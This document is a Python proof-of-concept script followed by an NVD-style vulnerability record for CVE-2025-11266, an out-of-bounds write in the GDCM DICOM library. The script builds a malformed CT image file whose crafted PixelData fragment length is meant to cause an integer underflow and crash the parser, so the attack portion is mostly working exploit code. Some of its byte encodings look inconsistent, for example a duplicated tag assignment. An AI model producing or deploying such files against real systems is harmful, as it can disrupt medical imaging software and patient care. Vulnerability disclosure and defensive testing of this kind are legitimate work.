CVE-2025-11266

import struct import os def create_malicious_dicom(): """ Generate PoC DICOM file for CVE-2025-11266 This PoC creates a malformed DICOM file with crafted PixelData to trigger out-of-bounds write in GDCM library. """ # DICOM File Meta Information (preamble + prefix) preamble = b'\x00' * 128 prefix = b'DICM' # Group 0002 Elements (File Meta Information) meta_group = b'\x00\x02' # Transfer Syntax UID (1.2.840.10008.1.2 = Explicit VR Little Endian) transfer_syntax = meta_group + struct.pack('<H', 0x0010) + b'\x00\x10' + b'\x01\x02\x00\x00' transfer_syntax += b'1.2.840.10008.1.2\x00\x00\x00' # Media Storage SOP Class UID (1.2.840.10008.5.1.4.1.1.2 = CT Image Storage) sop_class = meta_group + struct.pack('<H', 0x0002) + b'\x00\x06' + b'\x01\x02\x00\x00' sop_class += b'1.2.840.10008.5.1.4.1.1.2\x00\x00' # SOP Instance UID sop_instance = meta_group + struct.pack('<H', 0x0013) + b'\x00\x18' + b'\x01\x02\x00\x00' sop_instance += b'1.2.3.4.5.6.7.8.9.0.1.2.3.4.5.6\x00\x00\x00' # Patient Name (0008,0010) - VR=PN patient_name_tag = b'\x00\x08\x00\x10' patient_name = b'ANONYMOUS\x00\x00' patient_name_elem = patient_name_tag + b'\x00\x08' + b'\x01\x02\x00\x00' + patient_name # Modality (0008,0060) - VR=CS modality_tag = b'\x00\x08\x00\x60' modality = b'CT\x00\x00' modality_elem = modality_tag + b'\x00\x04' + b'\x01\x02\x00\x00' + modality # Rows (0028,0010) - VR=US rows_tag = b'\x00\x28\x00\x10' rows_elem = rows_tag + b'\x00\x02' + b'\x01\x02\x00\x00' + struct.pack('<H', 512) # Columns (0028,0011) - VR=US cols_tag = b'\x00\x28\x00\x11' cols_elem = cols_tag + b'\x00\x02' + b'\x01\x02\x00\x00' + struct.pack('<H', 512) # Bits Allocated (0028,0100) - VR=US bits_tag = b'\x00\x28\x00\x10' # Actually 0100 bits_tag = b'\x00\x28\x01\x00' bits_elem = bits_tag + b'\x00\x02' + b'\x01\x02\x00\x00' + struct.pack('<H', 16) # Pixel Data (7FE0,0010) - Encapsulated - THE VULNERABLE TAG # Craft malformed encapsulated PixelData to trigger integer underflow pixel_data_tag = b'\x7f\xe0\x00\x10' # Use OB (Other Byte) VR with undefined length (0xFFFFFFFF) # This marks encapsulated data pixel_data_header = pixel_data_tag + b'\x00\x08' + b'\x01\x02\x00\x00' + struct.pack('<I', 0xFFFFFFFF) # Craft fragment with malicious length to cause underflow # Sequence Delimitation Item (no length) seq_delim = struct.pack('<I', 0x00000000) item_end = struct.pack('<I', 0x00000000) # Craft malicious fragment with length that causes underflow # When GDCM calculates: fragment_length - 8 (for header), can underflow # Set length to small value like 4, then subtract 8 = -4 = 0xFFFFFFFC (underflow) item_start = struct.pack('<I', 0xE0000000) # Item with length malicious_length = struct.pack('<I', 0x00000004) # Length = 4 bytes malicious_data = b'\x41' * 4 # 4 bytes of data # End of Pixel Data Sequence seq_end = struct.pack('<I', 0xE0DD7FE0) + struct.pack('<I', 0x00000000) # Combine all parts pixel_data_fragment = item_start + malicious_length + malicious_data + item_end pixel_data_elem = pixel_data_header + pixel_data_fragment + seq_delim + seq_end # Combine all elements dicom_file = preamble + prefix + transfer_syntax + sop_class + sop_instance dicom_file += patient_name_elem + modality_elem + rows_elem + cols_elem + bits_elem dicom_file += pixel_data_elem return dicom_file if __name__ == '__main__': poc_data = create_malicious_dicom() output_file = 'CVE-2025-11266_poc.dcm' with open(output_file, 'wb') as f: f.write(poc_data) print(f'[+] PoC DICOM file created: {output_file}') print(f'[+] File size: {len(poc_data)} bytes') print('[+] This file triggers OOB write in GDCM when parsed')

{"cve": {"id": "CVE-2025-11266", "sourceIdentifier": "[email protected]", "published": "2025-12-12T21:15:51.653", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "An out-of-bounds write vulnerability exists in the Grassroots DICOM library (GDCM). The issue is triggered during parsing of a malformed DICOM file containing encapsulated PixelData fragments (compressed image data stored as multiple fragments). This vulnerability leads to a segmentation fault caused by an out-of-bounds memory access due to unsigned integer underflow in buffer indexing. It is exploitable via file input, simply opening a crafted malicious DICOM file is sufficient to trigger the crash, resulting in a denial-of-service condition."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:H", "baseScore": 6.6, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-787"}]}], "references": [{"url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsma-25-345-01.json", "source": "[email protected]"}, {"url": "https://github.com/malaterre/GDCM/releases/tag/v3.2.2", "source": "[email protected]"}, {"url": "https://www.cisa.gov/news-events/ics-medical-advisories/icsma-25-345-01", "source": "[email protected]"}, {"url": "https://github.com/malaterre/GDCM/commit/5829c95c8ac3afa9a3a3413675e948959c28a789", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}